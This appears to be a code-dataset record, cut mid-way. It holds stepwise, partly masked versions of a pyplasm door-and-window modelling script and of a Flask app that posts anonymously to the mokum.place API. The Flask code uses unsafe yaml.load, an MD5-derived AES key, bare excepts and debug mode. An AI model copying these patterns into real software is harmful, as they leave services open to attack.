\n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. 
\n\tThe inner function is useful for scaling the resulting door by the three parameter dx, dy, dz.\"\"\"\n\n def door0(dx, dy, dz):\n model = []\n for xIndex in range(len(doorX)):\n yQuotes = []\n xSum = sum(doorX[:xIndex])\n for yIndex in range(len(doorY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-doorY[yIndex])\n else:\n yQuotes.append(doorY[yIndex])\n model.append(PROD([QUOTE([-xSum, doorX[xIndex]]), QUOTE(yQuotes)]))\n res = PROD([STRUCT(model), Q(dy)])\n res = MAP([S2, S3, S1])(res)\n res = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(res)[0],\n dz / SIZE([3])(res)[0]])(res)\n door = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(STRUCT([res]))\n glass = CUBOID([SIZE([1])(res)[0] * 0.94, 0.01, SIZE([3])(res)[0] *\n 0.94])\n glass = T([1, 2, 3])([dx * 0.003, dy / 2, dz * 0.005])(glass)\n glass = TEXTURE(['glass.jpg'])(glass)\n refiner = CUBOID([0.03, 0.01, dz])\n refiner = T([1, 2])([dx / 2, dy])(refiner)\n refiner = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(refiner)\n handler1 = T(3)(0.15)(CUBOID([0.05, 0.02, 0.2]))\n handler2 = CUBOID([0.05, 0.02, 0.05])\n handler3 = T([1, 2])([0.01, 0.02])(CUBOID([0.03, 0.02, 0.2]))\n handler = TEXTURE('bronze.jpg')(STRUCT([handler3, handler2, handler1]))\n handler = T([1, 2, 3])([dx / 2.0 - 2 * SIZE([1])(handler)[0], dy, \n dz / 2.0 - 1.5 * SIZE([3])(handler)[0]])(handler)\n finalDoor = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(\n res)[0], dz / SIZE([3])(res)[0]])(STRUCT([door, glass, refiner,\n handler]))\n return finalDoor\n return door0\n\n\nVIEW(door(doorX, doorY, doorOccurrency)(2.2, 0.4, 2.8))\nVIEW(window(windowX, windowY, windowOccurrency)(0.6, 0.1, 1.2))\n", "step-4": "from pyplasm import *\ndoorY = [0.2, 0.18, 0.08, 0.18, 0.08, 0.18, 0.4, 0.18, 0.08, 0.18, 0.08, \n 0.18, 0.2]\ndoorX = [0.2, 0.5, 0.2, 1.8, 0.08, 0.18, 0.08, 0.18, 0.2]\ndoorOccurrency = [[True] * 13, [True, False, True, False, True, False, True,\n False, True, False, True, False, True], [True] * 13, [True, False, True,\n False, True, False, True, False, True, False, True, False, True], [True,\n False, True, False, True, True, True, True, True, False, True, False, \n True], [True, False, True, False, False, False, True, False, False, \n False, True, False, True], [True, False, True, True, True, True, True, \n True, True, True, True, False, True], [True, False, False, False, False,\n False, True, False, False, False, False, False, True], [True] * 13]\nwindowY = [0.04, 0.04, 0.2, 0.02, 0.16, 0.02, 0.2, 0.04, 0.04]\nwindowX = [0.02, 0.8, 0.05, 0.02, 0.4, 0.02, 0.4, 0.05, 0.04]\nwindowOccurrency = [[True] * 9, [True, False, False, False, False, False, \n False, False, True], [True] * 9, [True] * 9, [True, True, False, True, \n False, True, False, True, True], [True] * 9, [True, True, False, True, \n False, True, False, True, True], [True] * 9, [True] * 9]\n\n\ndef resizeXY(X, Y, occurrency, dx, dz):\n \"\"\"This function takes in input X,Y,occurrency, two dimensions dx, dz and scales the values\n\tcontained in X and Y, in such a way that only empty spaces are scaled and filled spaces are mantained fixed\"\"\"\n sumY = sum(Y)\n sumX = sum(X)\n visitedY = [False] * len(Y)\n for y_index in range(len(Y)):\n update = True\n for x_index in range(len(X)):\n if occurrency[x_index][y_index] == False:\n update = False\n if update:\n sumY = sumY - Y[y_index]\n sumX = sumX - X[y_index]\n dx = dx - X[y_index]\n dz = dz - Y[y_index]\n for x_index in range(len(X)):\n modifyX = False\n for y_index in range(len(Y)):\n if 
occurrency[x_index][y_index] == False and visitedY[y_index\n ] == False:\n Y[y_index] = dz * Y[y_index] / sumY\n visitedY[y_index] = True\n modifyX = True\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == True and not modifyX:\n modifyX = True\n if modifyX:\n X[x_index] = dx * X[x_index] / sumX\n\n\ndef window(windowX, windowY, occurrency):\n \"\"\"This function, given three array, X, Y and occurrency, return the HPC model of the window\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for 'scaling'\"\"\"\n\n def window0(dx, dy, dz):\n resizeXY(windowX, windowY, occurrency, dx, dz)\n model = []\n for xIndex in range(len(windowX)):\n yQuotes = []\n xSum = sum(windowX[:xIndex])\n for yIndex in range(len(windowY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-windowY[yIndex])\n else:\n yQuotes.append(windowY[yIndex])\n model.append(PROD([QUOTE([-xSum, windowX[xIndex]]), QUOTE(\n yQuotes)]))\n result = STRUCT(model)\n result = MAP([S2, S3, S1])(PROD([result, Q(dy)]))\n windowFrame = STRUCT([result])\n windowFrame = TEXTURE(['iron.jpg'])(windowFrame)\n glass = CUBOID([SIZE([1])(result)[0] * 0.98, 0.001, SIZE([3])(\n result)[0] * 0.95])\n glass = T([1, 2, 3])([dx * 0.005, dy / 2, 0.01])(glass)\n glass = TEXTURE(['glass2.jpg'])(glass)\n window = STRUCT([windowFrame, glass])\n window = S([1, 2, 3])([dx / SIZE([1])(window)[0], dy / SIZE([2])(\n window)[0], dz / SIZE([3])(window)[0]])(window)\n return window\n return window0\n\n\ndef door(doorX, doorY, occurrency):\n \"\"\"This function takes in input three array, X, Y and occurrency and returns the HPC model of the door\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. 
\n\tThe inner function is useful for scaling the resulting door by the three parameter dx, dy, dz.\"\"\"\n\n def door0(dx, dy, dz):\n model = []\n for xIndex in range(len(doorX)):\n yQuotes = []\n xSum = sum(doorX[:xIndex])\n for yIndex in range(len(doorY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-doorY[yIndex])\n else:\n yQuotes.append(doorY[yIndex])\n model.append(PROD([QUOTE([-xSum, doorX[xIndex]]), QUOTE(yQuotes)]))\n res = PROD([STRUCT(model), Q(dy)])\n res = MAP([S2, S3, S1])(res)\n res = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(res)[0],\n dz / SIZE([3])(res)[0]])(res)\n door = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(STRUCT([res]))\n glass = CUBOID([SIZE([1])(res)[0] * 0.94, 0.01, SIZE([3])(res)[0] *\n 0.94])\n glass = T([1, 2, 3])([dx * 0.003, dy / 2, dz * 0.005])(glass)\n glass = TEXTURE(['glass.jpg'])(glass)\n refiner = CUBOID([0.03, 0.01, dz])\n refiner = T([1, 2])([dx / 2, dy])(refiner)\n refiner = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(refiner)\n handler1 = T(3)(0.15)(CUBOID([0.05, 0.02, 0.2]))\n handler2 = CUBOID([0.05, 0.02, 0.05])\n handler3 = T([1, 2])([0.01, 0.02])(CUBOID([0.03, 0.02, 0.2]))\n handler = TEXTURE('bronze.jpg')(STRUCT([handler3, handler2, handler1]))\n handler = T([1, 2, 3])([dx / 2.0 - 2 * SIZE([1])(handler)[0], dy, \n dz / 2.0 - 1.5 * SIZE([3])(handler)[0]])(handler)\n finalDoor = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(\n res)[0], dz / SIZE([3])(res)[0]])(STRUCT([door, glass, refiner,\n handler]))\n return finalDoor\n return door0\n\n\nVIEW(door(doorX, doorY, doorOccurrency)(2.2, 0.4, 2.8))\nVIEW(window(windowX, windowY, windowOccurrency)(0.6, 0.1, 1.2))\n", "step-5": "from pyplasm import *\n\ndoorY = [.2,.18,.08,.18,.08,.18,.4,.18,.08,.18,.08,.18,.2]\ndoorX = [.2,.5,.2,1.8,.08,.18,.08,.18,.2]\n\ndoorOccurrency = [[True]*13,\n\t\t\t\t\t[True, False, True, False, True, False, True, False, True, False, True, False, True],\n\t\t\t\t\t[True]*13,\n\t\t\t\t\t[True, False, True, False, True, False, True, False, True, False, True, False, True],\n\t\t\t\t\t[True, False, True, False, True, True, True, True, True, False, True, False, True],\n\t\t\t\t\t[True, False, True, False, False, False, True, False, False, False, True, False, True],\n\t\t\t\t\t[True, False, True, True, True, True, True, True, True, True, True, False, True],\n\t\t\t\t\t[True, False, False, False, False, False, True, False, False, False, False, False, True],\n\t\t\t\t\t[True]*13]\n\nwindowY = [0.04,0.04,0.2,0.02,0.16,0.02,0.2,0.04,0.04]\nwindowX = [0.02,0.8,0.05,0.02,0.4,0.02,0.4,0.05,0.04]\n\nwindowOccurrency = [[True]*9,\n\t\t\t\t\t[True, False, False, False, False, False, False, False, True],\n\t\t\t\t\t[True]*9,\n\t\t\t\t\t[True]*9,\n\t\t\t\t\t[True, True, False, True, False, True, False, True, True],\n\t\t\t\t\t[True]*9,\n\t\t\t\t\t[True, True, False, True, False, True, False, True, True],\n\t\t\t\t\t[True]*9,\n\t\t\t\t\t[True]*9]\n\ndef resizeXY(X, Y, occurrency, dx, dz):\n\t\"\"\"This function takes in input X,Y,occurrency, two dimensions dx, dz and scales the values\n\tcontained in X and Y, in such a way that only empty spaces are scaled and filled spaces are mantained fixed\"\"\"\n\tsumY = sum(Y) \n\tsumX = sum(X)\n\tvisitedY = [False]*len(Y)\n\tfor y_index in range(len(Y)):\n\t\tupdate = True\n\t\tfor x_index in range(len(X)):\n\t\t\tif(occurrency[x_index][y_index] == False):\n\t\t\t\tupdate = False \n\t\tif(update):\n\t\t\tsumY = sumY - Y[y_index]\n\t\t\tsumX = sumX - X[y_index]\n\t\t\tdx = dx - X[y_index]\n\t\t\tdz = dz 
- Y[y_index]\n\n\tfor x_index in range(len(X)):\n\t\tmodifyX = False\n\t\tfor y_index in range(len(Y)):\n\t\t\tif(occurrency[x_index][y_index] == False and visitedY[y_index] == False):\n\t\t\t\tY[y_index] = (dz * Y[y_index])/sumY\n\t\t\t\tvisitedY[y_index] = True\n\t\t\t\tmodifyX = True\n\t\t\tif(occurrency[x_index][y_index] == False and visitedY[y_index] == True and not modifyX):\n\t\t\t\tmodifyX = True\n\t\tif(modifyX):\n\t\t\tX[x_index] = (dx * X[x_index])/sumX\n\n\ndef window(windowX, windowY, occurrency):\n\t\"\"\"This function, given three array, X, Y and occurrency, return the HPC model of the window\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for 'scaling'\"\"\"\n\tdef window0(dx, dy, dz):\n\n\t\tresizeXY(windowX,windowY,occurrency, dx, dz)\n\n\t\tmodel = []\n\t\tfor xIndex in range(len(windowX)):\n\t\t\tyQuotes = []\n\t\t\txSum = sum(windowX[:xIndex])\n\t\t\tfor yIndex in range(len(windowY)):\n\t\t\t\tif(occurrency[xIndex][yIndex] == False):\n\t\t\t\t\tyQuotes.append(-windowY[yIndex])\n\t\t\t\telse:\n\t\t\t\t\tyQuotes.append(windowY[yIndex])\n\t\t\tmodel.append(PROD([QUOTE([-xSum, windowX[xIndex]]), QUOTE(yQuotes)]))\n\n\t\tresult = STRUCT(model)\n\t\tresult = MAP([S2,S3,S1])(PROD([result, Q(dy)]))\n\t\twindowFrame = STRUCT([result])\n\t\twindowFrame = TEXTURE([\"iron.jpg\"])(windowFrame)\n\n\t\tglass = CUBOID([SIZE([1])(result)[0]*0.98,0.001,SIZE([3])(result)[0]*0.95])\n\t\tglass = T([1,2,3])([dx*0.005, dy/2, 0.01])(glass)\n\t\tglass = TEXTURE([\"glass2.jpg\"])(glass) \n\n\t\twindow = STRUCT([windowFrame, glass])\n\t\twindow = S([1,2,3])([dx/SIZE([1])(window)[0], dy/SIZE([2])(window)[0], dz/SIZE([3])(window)[0]])(window)\n\t\t\n\t\treturn window\n\n\treturn window0\n\n\ndef door(doorX, doorY, occurrency):\n\t\"\"\"This function takes in input three array, X, Y and occurrency and returns the HPC model of the door\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. 
\n\tThe inner function is useful for scaling the resulting door by the three parameter dx, dy, dz.\"\"\"\n\tdef door0(dx, dy, dz):\n\n\t\tmodel = []\n\n\t\tfor xIndex in range(len(doorX)):\n\t\t\tyQuotes = []\n\t\t\txSum = sum(doorX[:xIndex])\n\t\t\tfor yIndex in range(len(doorY)):\n\t\t\t\tif(occurrency[xIndex][yIndex] == False):\n\t\t\t\t\tyQuotes.append(-doorY[yIndex])\n\t\t\t\telse:\n\t\t\t\t\tyQuotes.append(doorY[yIndex])\n\t\t\tmodel.append(PROD([ QUOTE([-xSum, doorX[xIndex]]), QUOTE(yQuotes)]))\n\n\t\tres = PROD([STRUCT(model), Q(dy)])\n\t\tres = MAP([S2,S3,S1])(res)\n\t\tres = S([1,2,3])([dx/SIZE([1])(res)[0], dy/SIZE([2])(res)[0], dz/SIZE([3])(res)[0]]) (res)\n\n\t\tdoor = TEXTURE([\"wood.jpg\", True, False, 1, 1, 0, 1, 1])(STRUCT([res]))\n\n\t\tglass = CUBOID([SIZE([1])(res)[0]*0.94, 0.01, SIZE([3])(res)[0]*0.94])\n\t\tglass = T([1,2,3])([dx*0.003, dy/2, dz*0.005])(glass)\n\t\tglass = TEXTURE([\"glass.jpg\"])(glass)\n\n\t\trefiner = CUBOID([0.03, 0.01,dz])\n\t\trefiner = T([1,2])([dx/2,dy])(refiner)\n\t\trefiner = TEXTURE([\"wood.jpg\", True, False, 1, 1, 0, 1, 1])(refiner)\n\n\t\thandler1 = T(3)(.15)(CUBOID([.05,.02,.2]))\n\t\thandler2 = CUBOID([.05,.02,.05])\n\t\thandler3 = T([1,2])([.01,.02])(CUBOID([.03,.02,.2]))\n\t\thandler = TEXTURE(\"bronze.jpg\")(STRUCT([handler3, handler2, handler1]))\n\t\thandler = T([1,2,3])([dx/2.-2*SIZE([1])(handler)[0],dy, dz/2.-1.5*SIZE([3])(handler)[0]])(handler)\n\n\t\tfinalDoor = S([1,2,3])([dx/SIZE([1])(res)[0], dy/SIZE([2])(res)[0], dz/SIZE([3])(res)[0]]) (STRUCT([door, glass, refiner, handler]))\n\n\t\treturn finalDoor\n\n\treturn door0\n\nVIEW(door(doorX, doorY, doorOccurrency)(2.2, .4, 2.8))\nVIEW(window(windowX,windowY,windowOccurrency)(.6,.1,1.2))", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
from flask import Flask from flask import request, redirect, render_template from flask_bootstrap import Bootstrap import urllib.request import urllib.parse import json import uuid import yaml import hashlib from Crypto import Random from Crypto.Cipher import AES import base64 app = Flask(__name__) Bootstrap(app) with open("app_config.yml", 'r') as ymlfile: cfg = yaml.load(ymlfile) postapikey = cfg['app']['postapikey'] mainurl = cfg['app']['mainurl'] appurl = cfg['app']['appurl'] secretkey = cfg['app']['secret'] # Some crypto staff BLOCK_SIZE = 16 def trans(key): return hashlib.md5(key.encode("utf-8")).digest() def encrypt(message, passphrase): passphrase = trans(passphrase) IV = Random.new().read(BLOCK_SIZE) aes = AES.new(passphrase, AES.MODE_CFB, IV) return base64.b32encode(IV + aes.encrypt(message)).decode("utf-8") def decrypt(encrypted, passphrase): passphrase = trans(passphrase) encrypted = base64.b32decode(encrypted) IV = encrypted[:BLOCK_SIZE] aes = AES.new(passphrase, AES.MODE_CFB, IV) return aes.decrypt(encrypted[BLOCK_SIZE:]).decode("utf-8") def mokum_message(message): try: postdata = {"post": {"timelines": ["user"], "text": message, "comments_disabled": True, "nsfw": False}, "_uuid": str(uuid.uuid4()) } req = urllib.request.Request("https://mokum.place/api/v1/posts.json") req.add_header('Content-Type', 'application/json') req.add_header('Accept', 'application/json') req.add_header('X-API-Token', postapikey) resp = urllib.request.urlopen(req, json.dumps(postdata).encode("utf-8")) message = json.loads(resp.read().decode("utf-8")) if message['post']['id']: return message['post']['id'] except: return False def mokum_comment(messageid, comment): try: posturl = "https://mokum.place/api/v1/posts/" + str(messageid) + "/comments.json" postdata = {"comment": {"text": comment, # "platform": "anonymous device" }, "_uuid": str(uuid.uuid4())} req = urllib.request.Request(posturl) req.add_header('Content-Type', 'application/json') req.add_header('Accept', 'application/json') req.add_header('X-API-Token', postapikey) resp = urllib.request.urlopen(req, json.dumps(postdata).encode("utf-8")) message = json.loads(resp.read().decode("utf-8")) if message['id']: return message['id'] except: return False @app.route('/') def main(): return render_template('post.html') @app.route('/post', methods=['POST']) def post(): posttext = request.form['post'] id = mokum_message(posttext) mokum_comment(id, "click to comment --> " + appurl + "/c/" + encrypt(str(id), secretkey)) return redirect(mainurl + str(id)) @app.route('/c/<cid>') def comm(cid): return render_template('comment.html', cid=cid) @app.route('/comment', methods=['POST']) def commented(): postid = decrypt(request.form['cid'], secretkey) posttext = request.form['comment'] mokum_comment(postid, posttext) return redirect(mainurl + postid) if __name__ == '__main__': app.run(debug=True)
normal
{ "blob_id": "e55115a65ebee5d41dcd01a5cbabc328acf152da", "index": 6079, "step-1": "<mask token>\n\n\ndef encrypt(message, passphrase):\n passphrase = trans(passphrase)\n IV = Random.new().read(BLOCK_SIZE)\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return base64.b32encode(IV + aes.encrypt(message)).decode('utf-8')\n\n\ndef decrypt(encrypted, passphrase):\n passphrase = trans(passphrase)\n encrypted = base64.b32decode(encrypted)\n IV = encrypted[:BLOCK_SIZE]\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return aes.decrypt(encrypted[BLOCK_SIZE:]).decode('utf-8')\n\n\ndef mokum_message(message):\n try:\n postdata = {'post': {'timelines': ['user'], 'text': message,\n 'comments_disabled': True, 'nsfw': False}, '_uuid': str(uuid.\n uuid4())}\n req = urllib.request.Request('https://mokum.place/api/v1/posts.json')\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode('utf-8')\n )\n message = json.loads(resp.read().decode('utf-8'))\n if message['post']['id']:\n return message['post']['id']\n except:\n return False\n\n\n<mask token>\n\n\[email protected]('/')\ndef main():\n return render_template('post.html')\n\n\[email protected]('/post', methods=['POST'])\ndef post():\n posttext = request.form['post']\n id = mokum_message(posttext)\n mokum_comment(id, 'click to comment --> ' + appurl + '/c/' + encrypt(\n str(id), secretkey))\n return redirect(mainurl + str(id))\n\n\[email protected]('/c/<cid>')\ndef comm(cid):\n return render_template('comment.html', cid=cid)\n\n\[email protected]('/comment', methods=['POST'])\ndef commented():\n postid = decrypt(request.form['cid'], secretkey)\n posttext = request.form['comment']\n mokum_comment(postid, posttext)\n return redirect(mainurl + postid)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef trans(key):\n return hashlib.md5(key.encode('utf-8')).digest()\n\n\ndef encrypt(message, passphrase):\n passphrase = trans(passphrase)\n IV = Random.new().read(BLOCK_SIZE)\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return base64.b32encode(IV + aes.encrypt(message)).decode('utf-8')\n\n\ndef decrypt(encrypted, passphrase):\n passphrase = trans(passphrase)\n encrypted = base64.b32decode(encrypted)\n IV = encrypted[:BLOCK_SIZE]\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return aes.decrypt(encrypted[BLOCK_SIZE:]).decode('utf-8')\n\n\ndef mokum_message(message):\n try:\n postdata = {'post': {'timelines': ['user'], 'text': message,\n 'comments_disabled': True, 'nsfw': False}, '_uuid': str(uuid.\n uuid4())}\n req = urllib.request.Request('https://mokum.place/api/v1/posts.json')\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode('utf-8')\n )\n message = json.loads(resp.read().decode('utf-8'))\n if message['post']['id']:\n return message['post']['id']\n except:\n return False\n\n\ndef mokum_comment(messageid, comment):\n try:\n posturl = 'https://mokum.place/api/v1/posts/' + str(messageid\n ) + '/comments.json'\n postdata = {'comment': {'text': comment}, '_uuid': str(uuid.uuid4())}\n req = urllib.request.Request(posturl)\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode('utf-8')\n )\n message = 
json.loads(resp.read().decode('utf-8'))\n if message['id']:\n return message['id']\n except:\n return False\n\n\[email protected]('/')\ndef main():\n return render_template('post.html')\n\n\[email protected]('/post', methods=['POST'])\ndef post():\n posttext = request.form['post']\n id = mokum_message(posttext)\n mokum_comment(id, 'click to comment --> ' + appurl + '/c/' + encrypt(\n str(id), secretkey))\n return redirect(mainurl + str(id))\n\n\[email protected]('/c/<cid>')\ndef comm(cid):\n return render_template('comment.html', cid=cid)\n\n\[email protected]('/comment', methods=['POST'])\ndef commented():\n postid = decrypt(request.form['cid'], secretkey)\n posttext = request.form['comment']\n mokum_comment(postid, posttext)\n return redirect(mainurl + postid)\n\n\n<mask token>\n", "step-3": "<mask token>\nBootstrap(app)\nwith open('app_config.yml', 'r') as ymlfile:\n cfg = yaml.load(ymlfile)\n<mask token>\n\n\ndef trans(key):\n return hashlib.md5(key.encode('utf-8')).digest()\n\n\ndef encrypt(message, passphrase):\n passphrase = trans(passphrase)\n IV = Random.new().read(BLOCK_SIZE)\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return base64.b32encode(IV + aes.encrypt(message)).decode('utf-8')\n\n\ndef decrypt(encrypted, passphrase):\n passphrase = trans(passphrase)\n encrypted = base64.b32decode(encrypted)\n IV = encrypted[:BLOCK_SIZE]\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return aes.decrypt(encrypted[BLOCK_SIZE:]).decode('utf-8')\n\n\ndef mokum_message(message):\n try:\n postdata = {'post': {'timelines': ['user'], 'text': message,\n 'comments_disabled': True, 'nsfw': False}, '_uuid': str(uuid.\n uuid4())}\n req = urllib.request.Request('https://mokum.place/api/v1/posts.json')\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode('utf-8')\n )\n message = json.loads(resp.read().decode('utf-8'))\n if message['post']['id']:\n return message['post']['id']\n except:\n return False\n\n\ndef mokum_comment(messageid, comment):\n try:\n posturl = 'https://mokum.place/api/v1/posts/' + str(messageid\n ) + '/comments.json'\n postdata = {'comment': {'text': comment}, '_uuid': str(uuid.uuid4())}\n req = urllib.request.Request(posturl)\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode('utf-8')\n )\n message = json.loads(resp.read().decode('utf-8'))\n if message['id']:\n return message['id']\n except:\n return False\n\n\[email protected]('/')\ndef main():\n return render_template('post.html')\n\n\[email protected]('/post', methods=['POST'])\ndef post():\n posttext = request.form['post']\n id = mokum_message(posttext)\n mokum_comment(id, 'click to comment --> ' + appurl + '/c/' + encrypt(\n str(id), secretkey))\n return redirect(mainurl + str(id))\n\n\[email protected]('/c/<cid>')\ndef comm(cid):\n return render_template('comment.html', cid=cid)\n\n\[email protected]('/comment', methods=['POST'])\ndef commented():\n postid = decrypt(request.form['cid'], secretkey)\n posttext = request.form['comment']\n mokum_comment(postid, posttext)\n return redirect(mainurl + postid)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-4": "from flask import Flask\nfrom flask import request, redirect, render_template\nfrom flask_bootstrap import Bootstrap\nimport urllib.request\nimport 
urllib.parse\nimport json\nimport uuid\nimport yaml\nimport hashlib\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\nimport base64\napp = Flask(__name__)\nBootstrap(app)\nwith open('app_config.yml', 'r') as ymlfile:\n cfg = yaml.load(ymlfile)\npostapikey = cfg['app']['postapikey']\nmainurl = cfg['app']['mainurl']\nappurl = cfg['app']['appurl']\nsecretkey = cfg['app']['secret']\nBLOCK_SIZE = 16\n\n\ndef trans(key):\n return hashlib.md5(key.encode('utf-8')).digest()\n\n\ndef encrypt(message, passphrase):\n passphrase = trans(passphrase)\n IV = Random.new().read(BLOCK_SIZE)\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return base64.b32encode(IV + aes.encrypt(message)).decode('utf-8')\n\n\ndef decrypt(encrypted, passphrase):\n passphrase = trans(passphrase)\n encrypted = base64.b32decode(encrypted)\n IV = encrypted[:BLOCK_SIZE]\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return aes.decrypt(encrypted[BLOCK_SIZE:]).decode('utf-8')\n\n\ndef mokum_message(message):\n try:\n postdata = {'post': {'timelines': ['user'], 'text': message,\n 'comments_disabled': True, 'nsfw': False}, '_uuid': str(uuid.\n uuid4())}\n req = urllib.request.Request('https://mokum.place/api/v1/posts.json')\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode('utf-8')\n )\n message = json.loads(resp.read().decode('utf-8'))\n if message['post']['id']:\n return message['post']['id']\n except:\n return False\n\n\ndef mokum_comment(messageid, comment):\n try:\n posturl = 'https://mokum.place/api/v1/posts/' + str(messageid\n ) + '/comments.json'\n postdata = {'comment': {'text': comment}, '_uuid': str(uuid.uuid4())}\n req = urllib.request.Request(posturl)\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode('utf-8')\n )\n message = json.loads(resp.read().decode('utf-8'))\n if message['id']:\n return message['id']\n except:\n return False\n\n\[email protected]('/')\ndef main():\n return render_template('post.html')\n\n\[email protected]('/post', methods=['POST'])\ndef post():\n posttext = request.form['post']\n id = mokum_message(posttext)\n mokum_comment(id, 'click to comment --> ' + appurl + '/c/' + encrypt(\n str(id), secretkey))\n return redirect(mainurl + str(id))\n\n\[email protected]('/c/<cid>')\ndef comm(cid):\n return render_template('comment.html', cid=cid)\n\n\[email protected]('/comment', methods=['POST'])\ndef commented():\n postid = decrypt(request.form['cid'], secretkey)\n posttext = request.form['comment']\n mokum_comment(postid, posttext)\n return redirect(mainurl + postid)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-5": "from flask import Flask\nfrom flask import request, redirect, render_template\nfrom flask_bootstrap import Bootstrap\nimport urllib.request\nimport urllib.parse\nimport json\nimport uuid\nimport yaml\nimport hashlib\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\nimport base64\n\n\n\n\napp = Flask(__name__)\nBootstrap(app)\n\nwith open(\"app_config.yml\", 'r') as ymlfile:\n cfg = yaml.load(ymlfile)\n\npostapikey = cfg['app']['postapikey']\nmainurl = cfg['app']['mainurl']\nappurl = cfg['app']['appurl']\nsecretkey = cfg['app']['secret']\n\n# Some crypto staff\n\nBLOCK_SIZE = 16\n\n\n\ndef trans(key):\n return 
hashlib.md5(key.encode(\"utf-8\")).digest()\n\n\ndef encrypt(message, passphrase):\n passphrase = trans(passphrase)\n IV = Random.new().read(BLOCK_SIZE)\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return base64.b32encode(IV + aes.encrypt(message)).decode(\"utf-8\")\n\n\ndef decrypt(encrypted, passphrase):\n passphrase = trans(passphrase)\n encrypted = base64.b32decode(encrypted)\n IV = encrypted[:BLOCK_SIZE]\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return aes.decrypt(encrypted[BLOCK_SIZE:]).decode(\"utf-8\")\n\n\ndef mokum_message(message):\n try:\n postdata = {\"post\": {\"timelines\": [\"user\"],\n \"text\": message,\n \"comments_disabled\": True,\n \"nsfw\": False},\n \"_uuid\": str(uuid.uuid4())\n }\n\n req = urllib.request.Request(\"https://mokum.place/api/v1/posts.json\")\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode(\"utf-8\"))\n\n message = json.loads(resp.read().decode(\"utf-8\"))\n\n if message['post']['id']:\n return message['post']['id']\n except:\n return False\n\n\ndef mokum_comment(messageid, comment):\n try:\n posturl = \"https://mokum.place/api/v1/posts/\" + str(messageid) + \"/comments.json\"\n postdata = {\"comment\": {\"text\": comment,\n # \"platform\": \"anonymous device\"\n },\n \"_uuid\": str(uuid.uuid4())}\n\n req = urllib.request.Request(posturl)\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode(\"utf-8\"))\n\n message = json.loads(resp.read().decode(\"utf-8\"))\n\n if message['id']:\n return message['id']\n\n except:\n return False\n\n\[email protected]('/')\ndef main():\n return render_template('post.html')\n\n\[email protected]('/post', methods=['POST'])\ndef post():\n posttext = request.form['post']\n id = mokum_message(posttext)\n mokum_comment(id, \"click to comment --> \" + appurl + \"/c/\" + encrypt(str(id), secretkey))\n return redirect(mainurl + str(id))\n\n\[email protected]('/c/<cid>')\ndef comm(cid):\n return render_template('comment.html', cid=cid)\n\n\[email protected]('/comment', methods=['POST'])\ndef commented():\n postid = decrypt(request.form['cid'], secretkey)\n posttext = request.form['comment']\n mokum_comment(postid, posttext)\n return redirect(mainurl + postid)\n\n\nif __name__ == '__main__':\n 